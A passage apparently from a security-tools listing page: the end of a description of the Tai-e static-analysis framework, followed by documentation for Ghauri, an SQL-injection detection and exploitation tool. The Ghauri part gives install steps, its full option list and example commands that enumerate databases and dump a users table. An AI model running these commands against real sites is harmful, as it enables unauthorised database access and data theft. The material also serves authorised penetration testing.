    • Control-flow graph construction
    • Classic data-flow analyses, e.g., live variable analysis, constant propagation
    • Your data-flow analyses
  • SpotBugs-like bug detection system
    • Bug detectors, e.g., null pointer detector, incorrect clone() detector
    • Your bug detectors

Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


How to Obtain Runnable Jar of Tai-e?

The simplest way is to download it from GitHub Releases.

Alternatively, you can build the latest Tai-e yourself from the source code. This can simply be done via Gradle (be sure that Java 17 (or a higher version) is available on your system). You just need to run the command gradlew fatJar, and the runnable jar will be generated in tai-e/build/, which includes Tai-e and all its dependencies.

Documentation

We are hosting the documentation of Tai-e on the GitHub wiki, where you can find more information about Tai-e such as Setup in IntelliJ IDEA, Command-Line Options, and Development of New Analysis.

Tai-e Assignments

In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd to the ghauri directory.
  • install the requirements: python3 -m pip install --upgrade -r requirements.txt
  • run: python3 setup.py install or python3 -m pip install -e .
  • you will now be able to run ghauri with the simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports the following injection payload types:
    • Boolean-based
    • Error-based
    • Time-based
    • Stacked queries
  • Supports SQL injection for the following DBMSes:
    • MySQL
    • Microsoft SQL Server
    • PostgreSQL
    • Oracle
  • Supports the following injection points:
    • GET/POST-based injections
    • Header-based injections
    • Cookie-based injections
    • Multipart form-data injections
    • JSON-based injections
  • Supports a proxy option: --proxy (see the examples below).
  • Supports parsing a request from a text file: -r file.txt
  • Supports limiting data extraction for dbs/tables/columns/dump: --start 1 --stop 2
  • Supports resuming all phases.
  • Supports skipping URL encoding of the payload: --skip-urlencode
  • Verifies extracted characters in case of boolean/time-based injections.
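For example, the switches above can be combined like this (the target URL, request file, and database name are illustrative):

ghauri -u "http://www.site.com/vuln.php?id=1" --dbs --proxy "http://127.0.0.1:8080"
ghauri -r request.txt --dbs --skip-urlencode
ghauri -u "http://www.site.com/vuln.php?id=1" -D testdb --tables --start 1 --stop 2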

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform, Python-based advanced SQL injection detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1').
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value
-H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrieve entries from offset for dbs/tables/columns/dump
--stop Retrieve entries up to offset for dbs/tables/columns/dump

Example:
ghauri -u http://www.site.com/vuln.php?id=1 --dbs
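A typical enumeration workflow chains the options above, drilling down from the current database to table entries (the database, table, and column names are illustrative):

ghauri -u "http://www.site.com/vuln.php?id=1" --current-db
ghauri -u "http://www.site.com/vuln.php?id=1" -D testdb --tables
ghauri -u "http://www.site.com/vuln.php?id=1" -D testdb -T users --columns
ghauri -u "http://www.site.com/vuln.php?id=1" -D testdb -T users -C id,username --dump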

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, and federal laws.
The developer assumes no liability and is not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union-based queries.

